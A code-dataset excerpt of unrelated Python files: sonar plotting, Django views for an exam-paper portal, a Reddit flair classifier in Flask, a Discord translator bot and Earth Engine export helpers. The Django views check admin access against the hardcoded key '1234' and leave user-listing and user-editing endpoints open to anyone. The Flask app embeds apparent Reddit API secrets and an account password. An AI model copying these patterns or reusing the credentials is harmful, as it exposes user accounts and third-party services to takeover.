ax_ran_ori_6.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_6)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_6)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_6)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_6.transAxes, fontdict=font)\n ax_ran_ori_6.grid(True)\n ## ************** ##\n ax_range_6 = figure3.add_subplot(2, 4, 7)\n ax_range_6.plot(range_6, '-r')\n curves = [\"sonar6 - no 65535\"]\n ax_range_6.legend(curves, prop={'size':18})\n leg = ax_range_6.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_6):\n ax_range_6.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_6.transAxes, fontdict=font)\n else:\n ax_range_6.text(0.5, 0.9, \"min: \" + \"{0:.1f}\".format(np.min(range_6)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_6)) + \" max: \" + \"{0:.1f}\".format(np.max(range_6)), horizontalalignment='center', verticalalignment='center', transform=ax_range_6.transAxes, fontdict=font)\n ax_range_6.grid(True)\n ## ----------------END 6 --------------------- ##\n ## ----------------BEGIN 7 -------------------- ##\n ax_ran_ori_7 = figure3.add_subplot(2, 4, 4)\n ax_ran_ori_7.plot(ran_ori_7, '-r')\n curves = [\"sonar7 - origin\"]\n ax_ran_ori_7.legend(curves, prop={'size':18})\n leg = ax_ran_ori_7.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(ran_ori_7):\n ax_ran_ori_7.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_7.transAxes, fontdict=font)\n else:\n ax_ran_ori_7.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(ran_ori_7)) + \" mean: \" + \"{0:.1f}\".format(np.mean(ran_ori_7)) + \" max: \" + \"{0:.1f}\".format(np.max(ran_ori_7)), horizontalalignment='center', verticalalignment='center', transform=ax_ran_ori_7.transAxes, fontdict=font)\n ax_ran_ori_7.grid(True)\n ## ************** ##\n ax_range_7 = figure3.add_subplot(2, 4, 8)\n ax_range_7.plot(range_7, '-r')\n curves = [\"sonar7 - no 65535\"]\n ax_range_7.legend(curves, prop={'size':18})\n leg = ax_range_7.get_legend()\n leg.legendHandles[0].set_color('blue')\n if 0 == len(range_7):\n ax_range_7.text(0.5, 0.5, 'range is empty', horizontalalignment='center', verticalalignment='center', transform=ax_range_7.transAxes, fontdict=font)\n else:\n ax_range_7.text(0.5, 0.5, \"min: \" + \"{0:.1f}\".format(np.min(range_7)) + \" mean: \" + \"{0:.1f}\".format(np.mean(range_7)) + \" max: \" + \"{0:.1f}\".format(np.max(range_7)), horizontalalignment='center', verticalalignment='center', transform=ax_range_7.transAxes, fontdict=font)\n ax_range_7.grid(True)\n ## ----------------END 7 --------------------- ##\n # ax_3.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n # ax_3.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.1f}\".format(np.min(diff_time_0)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_0)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_0)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_0)), fontdict=font)\n # curves = [\"CHANNEL1 - ID4 diff_time\"]\n # plt.legend(curves, prop={'size':18})\n # leg = ax_3.get_legend()\n # leg.legendHandles[0].set_color('blue')\n #plt.text(0, 90, \"duration: \" + str(min) + \"min : \" + str(sec) + \"sec : \" + str(msec) + \"msec\\n\", fontdict=font)\n #plt.text(750, 110, \"ID0 - diff_time:\\n min: \" + \"{0:.2f}\".format(np.min(diff_time_0)) + \"ms\\n mean: \" + \"{0:.2f}\".format(np.mean(diff_time_0)) + \"ms\\n max: \" + \"{0:.2f}\".format(np.max(diff_time_0)) + \"ms\\n std dev: \" + \"{0:.2f}\".format(np.std(diff_time_0)), fontdict=font)\n #plt.ylabel('ID0 diff timestamp[milliseconds]', size=10)\n ## curves = [\"CHANNEL0 - CAN diff time\"]\n ## plt.legend(curves, prop={'size':18})\n ## ax = plt.gca()\n ## leg = ax.get_legend()\n ## leg.legendHandles[0].set_color('blue')\n ## diff_linux_time = np.diff(linux_timestamp_0)\n ## plt.plot(diff_linux_time, '-r')\n ## font = {'family': 'serif',\n ## 'color': 'red',\n ## 'weight': 'normal',\n ## 'size': 14,\n ## }\n ## plt.text(110, 6000, \"ID1 - diff_linux_time:\\n min: \" + \"{0:.4f}\".format(np.min(diff_linux_time)) + \"ms\\n mean: \" + \"{0:.4f}\".format(np.mean(diff_linux_time)) + \"ms\\n max: \" + \"{0:.4f}\".format(np.max(diff_linux_time)) + \"ms\\n std dev: \" + \"{0:.4f}\".format(np.std(diff_linux_time)), fontdict=font)\n ## plt.ylabel('diff timestamp[milliseconds]', size=10)\n ## curves = [\"CAN time\", \"Linux time\"]\n ## plt.legend(curves, prop={'size':10})\n ## ax = plt.gca()\n ## leg = ax.get_legend()\n ## leg.legendHandles[0].set_color('blue')\n ## leg.legendHandles[1].set_color('red')\n ## plt.grid(True)\n plt.show()\n else:\n print(\"Usage: \" + sys.argv[0] + \" radar.txt\")\n","sub_path":"scripts/sonar/sonar_RANGE_compare_origin_filtered.py","file_name":"sonar_RANGE_compare_origin_filtered.py","file_ext":"py","file_size_in_byte":35641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"16644893","text":"from rest_framework.parsers import FileUploadParser\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework import permissions, status\nfrom django.http import Http404\nfrom django.core.mail import send_mail\nimport json\nimport random as r\n\nfrom .models import File,Interview, User, CommentsPYQ, CommentsExp, emailVerify\nfrom .serializers import FileSerializer, interviewSerializer, CommentsPYQSerializer, \\\n CommentsExpSerializer, emailSerializer, UserSerializer, UserSerializerWithToken\n\nimport logging\nlogging.basicConfig(filename='pyq.log',format='%(asctime)s,%(msecs)d %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n level=logging.INFO)\n\n\"\"\"\nemail verify\n\"\"\"\n@permission_classes([permissions.AllowAny])\ndef otpgen():\n otp = \"\"\n for i in range(4):\n otp += str(r.randint(1, 9))\n return otp\n\n\nclass confirmEmailID(APIView):\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, *args, **kwargs):\n data=request.data\n otp=otpgen()\n data[\"otp\"]=int(otp)\n emailVerify = emailSerializer(data=data)\n send_mail('SCP Demo', 'Hey Welcome! Your One Time Password is ' + otp, 'iiitbemailverify@gmail.com',\n [request.data[\"email\"]], fail_silently=False, )\n if emailVerify.is_valid():\n emailVerify.save()\n return Response(emailVerify.data, status=status.HTTP_201_CREATED)\n else:\n return Response(emailSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_object(self, otp):\n try:\n return emailVerify.objects.get(otp=otp)\n except emailVerify.DoesNotExist:\n raise Http404\n\n def get(self, request, otp, format=None):\n emailVerify = self.get_object(otp)\n serializer = emailSerializer(emailVerify)\n return Response(serializer.data)\n\nclass verifyEmailID(APIView):\n permission_classes = (permissions.AllowAny,)\n def get_object(self, otp):\n try:\n return emailVerify.objects.get(otp=otp)\n except emailVerify.DoesNotExist:\n raise Http404\n\n\n def post(self, request, *args, **kwargs):\n emailVerify = self.get_object(request.data[\"otp\"])\n serializer = emailSerializer(emailVerify, data=request.data,\n partial=True)\n if serializer.is_valid():\n emailVerify.delete()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n emailVerify.delete()\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\"\"\"\nEND - email verify\n\"\"\"\n\n\"\"\"\nUSER VIEWS\n\"\"\"\n\n@api_view(['GET'])\ndef current_user(request):\n \"\"\"\n Determine the current user by their token, and return their data\n \"\"\"\n serializer = UserSerializer(request.user)\n return Response(serializer.data)\n\n@api_view(['GET'])\ndef adminVerify(request):\n \"\"\"\n ADMIN KEY CHECK\n \"\"\"\n serializer = UserSerializer(request.user)\n role=serializer.data.get('role')\n if role=='admin' and request.GET.get('adminkey')==\"1234\":\n return Response(serializer.data)\n raise Http404\n \nclass UserList(APIView):\n \"\"\"\n Create a new user.\n \"\"\"\n\n permission_classes = (permissions.AllowAny,)\n\n def post(self, request, format=None):\n serializer = UserSerializerWithToken(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n \"\"\"\n get the details of all the users\n \"\"\"\n\n def get(self, request):\n \n user = User.objects.all()\n serializer = UserSerializer(user, many=True)\n return Response(serializer.data)\n\nclass loginDataId(APIView):\n \"\"\"\n Retrieve, update or delete a snippet instance based on roll number\n \"\"\"\n permission_classes = (permissions.AllowAny,)\n def get_object(self, rollNumber):\n try:\n return User.objects.get(rollNumber=rollNumber)\n except User.DoesNotExist:\n raise Http404\n\n def get(self, request, rollNumber, format=None):\n user = self.get_object(rollNumber)\n serializer = UserSerializer(user)\n return Response(serializer.data)\n\n def patch(self, request, rollNumber, format=None):\n user = self.get_object(rollNumber)\n serializer = UserSerializerWithToken(user, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\"\"\"\nEND OF USER VIEWS\n\"\"\"\n\nclass interviewData(APIView):\n def get(self, request):\n logging.info('Trying: GET: Interview Exp Data')\n product1 = Interview.objects.filter(verified=True)\n serializer = interviewSerializer(product1, many=True)\n logging.info(\"Successful: GET: Interview Exp Data\")\n return Response(serializer.data)\n\n def post(self, request, *args, **kwargs):\n logging.info('Trying: POST: Interview Exp Data')\n\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['name']=name\n\n file_serializer = interviewSerializer(data=request.data)\n if file_serializer.is_valid():\n file_serializer.save()\n logging.info(\"Successful: POST: Interview Exp Data, status %s\" % status.HTTP_201_CREATED)\n return Response(file_serializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning(\"Bad Request: POST: Interview Exp Data, status %s\" % status.HTTP_400_BAD_REQUEST)\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass interviewDataId(APIView):\n \"\"\"\n Retrieve, update or delete a snippet instance.\n \"\"\"\n def get_object(self, id):\n logging.info('Trying: GET: Interview Exp by id %s' % id)\n try:\n return Interview.objects.get(id=id)\n except Interview.DoesNotExist:\n raise Http404\n\n def get(self, request, id, format=None):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n\n product = self.get_object(id)\n serializer = interviewSerializer(product)\n verified=serializer.data.get('verified')\n # not returning anything if the page is not verified and user is a student\n if ((role == 'Student') and (verified == False)):\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n logging.info('Successful: GET: Interview Exp by id %s' % id)\n return Response(serializer.data)\n\n def patch(self, request, id):\n logging.info('Trying: PATCH: Interview Exp by id %s' % id)\n File = self.get_object(id)\n serializer = interviewSerializer(File, data=request.data,\n partial=True) # set partial=True to update a data partially\n if serializer.is_valid():\n serializer.save()\n logging.info('Successful: PATCH: Interview Exp by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n def delete(self, request, id, format=None):\n logging.info('Trying: DELETE: Interview Exp by id %s' % id)\n Interview = self.get_object(id)\n Interview.delete()\n logging.info('Successful: DELETE: Interview Exp by id %s, status %s' % (id,status.HTTP_204_NO_CONTENT))\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\"\"\"\nFOR ADMIN VIEWS\n\"\"\"\n@api_view(['GET'])\ndef interviewAdminView(request):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n if (role=='admin'):\n product1 = Interview.objects.filter(verified=False)\n serializer = interviewSerializer(product1, many=True)\n return Response(serializer.data)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n@api_view(['GET'])\ndef pyqAdminView(request):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n if (role=='admin'):\n product1 = File.objects.filter(verified=False)\n serializer = FileSerializer(product1, many=True)\n return Response(serializer.data)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\"\"\"\nEND ADMIN VIEWS\n\"\"\"\n\nclass getData(APIView):\n\n def get(self, request, *args, **kwargs):\n allFiles = File.objects.all()\n for key in request.data.keys():\n value = request.data.get(key)\n \n\nfrom .models import File\nfrom .serializers import serializers\n\nfrom .serializers import FileSerializer\n\nclass getData(APIView):\n\n def get(self, request, *args, **kwargs):\n logging.info('Trying: GET: PYQ Data')\n allFiles = File.objects.filter(verified=True)\n\n for key in request.GET.keys():\n value = request.GET.get(key)\n if (key == 'resourceType'):\n allFiles = allFiles.filter(resourceType=value)\n elif (key == 'semester'):\n allFiles = allFiles.filter(semester=value)\n elif (key == 'subject'):\n allFiles = allFiles.filter(subject=value)\n elif (key == 'year'):\n allFiles = allFiles.filter(year=value)\n elif (key == 'id'):\n allFiles = allFiles.filter(id=value)\n \n serializer = FileSerializer(allFiles, many=True)\n logging.info('Successful: GET: PYQ Data')\n return Response(serializer.data)\n\nclass patchData(APIView):\n def get_object(self, id):\n logging.info('Trying: GET: PYQ by id %s' % id)\n try:\n return File.objects.get(id=id)\n except File.DoesNotExist:\n raise Http404\n\n def patch(self, request, id):\n logging.info('Trying: PATCH: PYQ by id %s' % id)\n File = self.get_object(id)\n serializer = FileSerializer(File, data=request.data,\n partial=True) # set partial=True to update a data partially\n if serializer.is_valid():\n serializer.save()\n logging.info('Successful: PATCH: PYQ by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n def get(self, request, id, format=None):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n\n File = self.get_object(id)\n serializer = FileSerializer(File)\n verified=serializer.data.get('verified')\n # not returning anything if the page is not verified and user is a student\n if ((role == 'Student') and (verified == False)):\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n logging.info('Successful: GET: PYQ by id %s' % id)\n return Response(serializer.data)\n\nclass postData(APIView):\n def post(self, request, *args, **kwargs): \n logging.info('Trying: POST: PYQ')\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['author']=name\n\n file_serializer = FileSerializer(data=request.data)\n if file_serializer.is_valid():\n file_serializer.save()\n logging.info('Successful: POST: PYQ, status %s' % status.HTTP_201_CREATED)\n return Response(file_serializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning('Bad Request: POST: PYQ, status %s' % status.HTTP_400_BAD_REQUEST)\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass deleteData(APIView):\n def get_object(self, id):\n logging.info('Trying: GET: PYQ by id %s' % id)\n try:\n return File.objects.get(id=id)\n except File.DoesNotExist:\n raise Http404\n\n def delete(self, request, id, format=None):\n logging.info('Trying: DELETE: PYQ by id %s' % id)\n File = self.get_object(id)\n File.delete()\n logging.info('Successful: DELETE: PYQ by id %s, status %s' % (id,status.HTTP_204_NO_CONTENT))\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass getPostCommentsPYQ(APIView):\n def get(self, request, id):\n logging.info('Trying: GET: Comments for PYQ by id %s' % id)\n allComments = CommentsPYQ.objects.all().filter(pyq=id)\n\n commentsPYQSerializer = CommentsPYQSerializer(allComments, many=True)\n logging.info('Successful: GET: Comments for PYQ by id %s' % id)\n return Response(commentsPYQSerializer.data)\n\n def post(self, request, id):\n logging.info('Trying: POST: Comments for PYQ by id %s' % id)\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['author']=name\n \n commentsPYQSerializer = CommentsPYQSerializer(data=request.data)\n \n if commentsPYQSerializer.is_valid():\n commentsPYQSerializer.save()\n logging.info('Successful: POST: Comments for PYQ by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(commentsPYQSerializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning('Bad Request: POST: Comments for PYQ by id %s, status %s' % (id,status.HTTP_400_BAD_REQUEST))\n return Response(commentsPYQSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def get_comment(self, id):\n try:\n return CommentsPYQ.objects.get(id=id)\n except CommentsPYQ.DoesNotExist:\n raise Http404\n\n def delete(self, request, id):\n CommentsPYQ = self.get_comment(id)\n CommentsPYQ.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass getPostCommentsExp(APIView):\n def get(self, request, id):\n logging.info('Trying: GET: Comments for Interview Exp by id %s' % id)\n allComments = CommentsExp.objects.all().filter(exp=id)\n\n commentsExpSerializer = CommentsExpSerializer(allComments, many=True)\n logging.info('Successful: GET: Comments for Interview Exp by id %s' % id)\n return Response(commentsExpSerializer.data)\n\n def post(self, request, id):\n logging.info('Trying: POST: Comments for Interview Exp by id %s' % id)\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['author']=name\n\n commentsExpSerializer = CommentsExpSerializer(data=request.data)\n \n if commentsExpSerializer.is_valid():\n commentsExpSerializer.save()\n logging.info('Successful: POST: Comments for Interview Exp by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(commentsExpSerializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning('Bad Request: POST: Comments for Interview Exp by id %s, status %s' % (id,status.HTTP_400_BAD_REQUEST))\n return Response(commentsExpSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def get_comment(self, id):\n try:\n return CommentsExp.objects.get(id=id)\n except CommentsExp.DoesNotExist:\n raise Http404\n\n def delete(self, request, id):\n CommentsExp = self.get_comment(id)\n CommentsExp.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"SCPapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"632335755","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nimport pickle\r\nimport re\r\nimport flask\r\nimport praw\r\nfrom flask import Flask, render_template, request\r\n\r\napp=Flask(__name__)\r\n\r\nREPLACE_BY_SPACE_RE = re.compile('[/(){}\\[\\]\\|@,_;]')\r\nBAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')\r\n\r\nflairs={1:\"AskIndia\",\r\n2:\"Non-Political\",\r\n3:\"[R]eddiquette\",\r\n4:\"Scheduled\",\r\n5:\"Photography\",\r\n6:\"Science/Technology\",\r\n7:\"Politics\",\r\n8:\"Business/Finance\",\r\n9:\"Policy/Economy\",\r\n10:\"Sports\",\r\n11:\"Food\",\r\n12:\"AMA\"\r\n}\r\n\r\n@app.route('/')\r\n\r\n@app.route('/index')\r\ndef index():\r\n return flask.render_template('index.html')\r\n\r\n@app.route('/statistics')\r\ndef statistics():\r\n return flask.render_template('statistics.html')\r\n\r\n@app.route(\"/register\", methods=[\"POST\"])\r\ndef register():\r\n if request.method=='POST':\r\n nm = request.form.get(\"url\")\r\n mm=nm\r\n\r\n df1=pd.read_csv(\"https://raw.githubusercontent.com/abhisheksaxena1998/detector--redditv7/master/cleaned_reddit_alphabetav5.csv\")\r\n df1.dropna(inplace=True)\r\n df1.columns=['index','combined','flair'] \r\n #print (df1.head())\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(df1['combined'],df1['flair'],random_state=0)\r\n\r\n # Fit the CountVectorizer to the training data\r\n vect = CountVectorizer().fit(X_train)\r\n X_train_vectorized = vect.transform(X_train)\r\n model = RandomForestClassifier(n_estimators=500, criterion='entropy')\r\n model.fit(X_train_vectorized, y_train)\r\n reddit = praw.Reddit(client_id='WBTxS7rybznf7Q', client_secret='vJUTUflXITBsQMxeviOfG8mCZoA', user_agent='projectreddit', username='Mysterious_abhE', password='Saxena0705')\r\n #url=\"https://www.reddit.com/r/MapPorn/comments/a3p0uq/an_image_of_gps_tracking_of_multiple_wolves_in/\"\r\n submission = reddit.submission(url=nm)\r\n #print (submission.comments[0])\r\n #print (submission.title)\r\n submission.comments.replace_more(limit=0)\r\n #co=[]\r\n tr=[]\r\n c=''\r\n for top_level_comment in submission.comments: \r\n c+=top_level_comment.body \r\n\r\n\r\n tr=submission.title+nm+c\r\n #processed_tweets=[]\r\n #for tweet in range(len(tr)): \r\n processed_tweet = re.sub(r'\\W', ' ', str(tr))\r\n\r\n \r\n # Remove all the special characters\r\n \r\n processed_tweet = re.sub(r'http\\S+', ' ', processed_tweet)\r\n \r\n #processed_tweet = re.sub(r'https?:\\/\\/+', ' ', processed_tweet)\r\n \r\n #processed_tweet=re.sub(r'\\w+:\\/{2}[\\d\\w-]+(\\.[\\d\\w-]+)*(?:(?:\\/[^\\s/]*))*', ' ',processed_tweet)\r\n \r\n processed_tweet=re.sub(r'www\\S+', ' ', processed_tweet)\r\n \r\n processed_tweet=re.sub(r'co \\S+', ' ', processed_tweet)\r\n # remove all single characters\r\n processed_tweet = re.sub(r'\\s+[a-zA-Z]\\s+', ' ', processed_tweet)\r\n # Remove single characters from the start\r\n processed_tweet = re.sub(r'\\^[a-zA-Z]\\s+', ' ', processed_tweet) \r\n \r\n # Substituting multiple spaces with single space\r\n processed_tweet= re.sub(r'\\s+', ' ', processed_tweet, flags=re.I)\r\n \r\n # Removing prefixed 'b'\r\n processed_tweet = re.sub(r'^b\\s+', ' ', processed_tweet)\r\n \r\n processed_tweet = re.sub(r'\\d','',processed_tweet)\r\n \r\n processed_tweet= re.sub(r'\\s+', ' ', processed_tweet, flags=re.I)\r\n\r\n \r\n # Converting to Lowercase\r\n processed_tweet = processed_tweet.lower()\r\n processed_tweet=processed_tweet.replace('_',' ')\r\n \r\n #processed_tweets.append(processed_tweet)\r\n \r\n #print ((processed_tweet)) #print(model.predict(vect.transform([tr])))\r\n #filename='combined_modelv5_updated.pkl'\r\n\r\n #pickle.dump(model, open(filename, 'wb'))\r\n #load_lr_model =pickle.load(open(filename, 'rb'))\r\n #print (load_lr_model.predict(vect.transform([tr])))\r\n\r\n\r\n return flask.render_template('result.html',prediction=flairs[int(model.predict(vect.transform([processed_tweet])))],url=mm)\r\n \r\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496119967","text":"'''\n__author__ = \"Mateo Cetti, Ivan Nuñez, Francesco Silvetti\"\n__copyright__ = \"Copyright 2018, The TOPO Project\"\n__credits__ = [\"Mateo Cetti\", \"Ivan Nuñez\", \"Francesco Silvetti\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = [\"Mateo Cetti\", \"Ivan Nuñez\", \"Francesco Silvetti\"]\n__email__ = None\n__status__ = \"Work in progress\"\n'''\n\nimport discord #Import Discord.py.\nimport asyncio\nfrom discord.ext.commands import Bot\nfrom discord.ext import commands\n\nfrom googletrans import Translator #Google Translator API.\n\nimport time\nimport json\nfrom utilities.functions import *\n\nclass Bot(commands.Bot):\n\n def __init__(self, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\ndef main():\n\n bot = Bot(command_prefix=commands.when_mentioned_or(\"-\"), description='This is a BOT.', pm_help=True) #Instanciate the Bot.\n\n @bot.event\n async def on_ready():\n '''\n This method is called when the bot is succesfully loged in into Discord.\n '''\n print(\"READY\")\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n @bot.event\n async def on_message(message):\n '''\n This method is called when the bot receives a message from any Discord client.\n '''\n await bot.process_commands(message) #MAGIC\n\n print(str(time.time()) + ' :Message received from: ' + str(message.author.id) + ' , And says: ' + str(message.content))\n\n if (contains_not_allowed_characters(message)):\n\n await bot.delete_message(message)\n\n @bot.command(pass_context=True)\n async def japanify(ctx, *args):\n '''\n Translates Roman text to Japanese.\n '''\n translator = Translator()\n translation = translator.translate(\" \".join(args), dest=\"ja\")\n await bot.send_message(ctx.message.author, \"Original (Roman): {}\\nTranslated (Japanese): {}\".format(\" \".join(args), translation.text))\n\n @bot.command(pass_context=True)\n async def romanify(ctx, *args):\n '''\n Translates Japanese text to Roman.\n '''\n translator = Translator()\n translation = translator.translate(\" \".join(args), dest=\"es\")\n await bot.send_message(ctx.message.author, \"Original (Japanese): {}\\nTranslated (Roman): {}\".format(\" \".join(args), translation.text))\n\n try:\n\n with open('botinfo.json') as info_file:\n\n data = json.load(info_file)\n\n bot.run(data['bot'][0]['token']) #Runs TOPO using the token\n\n except Exception as e:\n\n print(e)\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"217604482","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \n ## Iterative - O(1) space complexity\n prev = None\n cur = head\n \n while cur:\n tmp_ll = cur.next\n cur.next = prev\n prev = cur\n cur = tmp_ll\n \n return prev\n \n ## Iterative - O(n) space complexity\n# stack = []\n \n# while head:\n# stack.append(head.val)\n# head = head.next\n \n# if stack == []: return None\n \n# head = ListNode(stack.pop())\n# cur = head\n# while stack:\n# node = ListNode(stack.pop())\n# cur.next = node\n# cur = cur.next\n \n# return head\n","sub_path":"Easy/reverseList.py","file_name":"reverseList.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515450728","text":"from typing import Union\n\nimport ee\nfrom rx import concat\nfrom rx.operators import flat_map\nfrom sepal.rx.workqueue import WorkQueue\nfrom sepal.task.rx.observables import progress\n\nfrom .asset import delete_asset\nfrom .observables import enqueue, execute\nfrom .task import execute_task\n\n\ndef export_image_to_asset(\n credentials,\n image: ee.Image,\n description: str = None,\n asset_id: str = None,\n pyramiding_policy: dict = None,\n dimensions=None,\n region: ee.Geometry = None,\n scale: int = None,\n crs: str = None,\n crs_transform: str = None,\n max_pixels: Union[int, float] = None,\n retries: int = 0\n):\n asset_id, description = _init_asset_id_and_description(asset_id, description)\n\n def create_task():\n task = ee.batch.Export.image.toAsset(image=image, description=description, assetId=asset_id,\n pyramidingPolicy=pyramiding_policy, dimensions=dimensions, region=region, scale=scale, crs=crs,\n crsTransform=crs_transform, maxPixels=max_pixels)\n task.asset_id = asset_id\n return task\n\n return _export_to_asset(\n credentials,\n create_task=create_task,\n description='export_image_to_asset(asset_id={}, description={}'.format(asset_id, description),\n retries=retries\n )\n\n\ndef export_table_to_asset(\n credentials,\n collection: ee.FeatureCollection,\n description: str = None,\n asset_id: str = None,\n retries: int = 0\n):\n asset_id, description = _init_asset_id_and_description(asset_id, description)\n\n def create_task():\n task = ee.batch.Export.table.toAsset(collection=collection, description=description, assetId=asset_id)\n task.asset_id = asset_id\n return task\n\n return _export_to_asset(\n credentials,\n create_task=create_task,\n description='export_table_to_asset(asset_id={}, description={}'.format(asset_id, description),\n retries=retries\n )\n\n\ndef export_image_to_drive(\n credentials,\n image: ee.Image,\n description: str,\n folder: str = None,\n file_name_prefix: str = None,\n dimensions=None,\n region: ee.Geometry = None,\n scale: int = None,\n crs: str = None,\n crs_transform: str = None,\n max_pixels: int = None,\n file_dimensions=None,\n skip_empty_tiles=None,\n file_format: str = None,\n format_options: str = None,\n retries: int = 0\n):\n def create_task():\n return ee.batch.Export.image.toDrive(\n image=image,\n description=description,\n folder=folder,\n fileNamePrefix=file_name_prefix,\n dimensions=dimensions,\n region=region,\n scale=scale,\n crs=crs,\n crsTransform=crs_transform,\n maxPixels=max_pixels,\n fileDimensions=file_dimensions,\n skipEmptyTiles=skip_empty_tiles,\n fileFormat=file_format,\n formatOptions=format_options\n )\n\n return _export_to_drive(\n credentials,\n create_task=create_task,\n description='export_image_to_drive(description={}, folder={}, fileNamePrefix={}'.format(\n description, folder, file_name_prefix\n ),\n retries=retries\n )\n\n\ndef export_table_to_drive(\n credentials,\n collection: ee.FeatureCollection,\n description: str = None,\n folder: str = None,\n file_name_prefix: str = None,\n file_format: str = None,\n selectors=None,\n retries: int = 0\n):\n def create_task():\n return ee.batch.Export.table.toDrive(\n collection=collection,\n description=description,\n folder=folder,\n fileNamePrefix=file_name_prefix,\n fileFormat=file_format,\n selectors=selectors\n )\n\n return _export_to_drive(\n credentials,\n create_task=create_task,\n description='export_table_to_drive(description={}, folder={}, fileNamePrefix={}'.format(\n description, folder, file_name_prefix\n ),\n retries=retries\n )\n\n\ndef _init_asset_id_and_description(asset_id, description):\n if asset_id and not description:\n i = asset_id.rfind('/')\n description = asset_id[i + 1:]\n elif description and not asset_id:\n asset_id = '{}/{}'.format(_first_asset_root(), description)\n elif not asset_id and not description:\n raise ValueError('asset_id or description must be specified when exporting 